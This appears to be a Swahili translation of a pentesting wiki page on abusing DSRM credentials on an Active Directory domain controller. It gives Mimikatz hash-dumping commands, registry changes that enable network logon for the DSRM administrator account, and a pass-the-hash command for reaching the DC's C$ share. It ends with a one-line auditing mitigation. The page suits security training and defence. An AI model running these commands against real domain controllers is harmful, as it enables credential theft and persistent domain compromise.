DSRM Credentials

Kuna akaunti ya meneja wa ndani ndani ya kila DC. Ukiwa na haki za admin katika mashine hii unaweza kutumia mimikatz kutoa hash ya Meneja wa ndani. Kisha, kubadilisha rejista ili kuamsha nenosiri hili ili uweze kufikia mtumiaji huyu wa Meneja wa ndani kwa mbali. Kwanza tunahitaji kutoa hash ya mtumiaji wa Meneja wa ndani ndani ya DC:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

Kisha tunahitaji kuangalia kama akaunti hiyo itafanya kazi, na ikiwa ufunguo wa rejista una thamani "0" au haupo unahitaji kuweka kuwa "2":

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

Kisha, ukitumia PTH unaweza orodhesha maudhui ya C$ au hata kupata shell. Kumbuka kwamba kwa kuunda kikao kipya cha powershell na hash hiyo kwenye kumbukumbu (kwa PTH) "domain" inayotumika ni jina tu la mashine ya DC:

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

More info about this in: https://adsecurity.org/?p=1714 and https://adsecurity.org/?p=1785

Mitigation

• Event ID 4657 - Ukaguzi wa uundaji/mabadiliko ya HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior